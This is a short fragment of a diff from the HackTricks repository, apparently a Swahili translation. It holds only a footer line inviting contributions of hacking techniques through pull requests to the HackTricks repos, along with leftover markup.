||||
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
Loading…
Reference in a new issue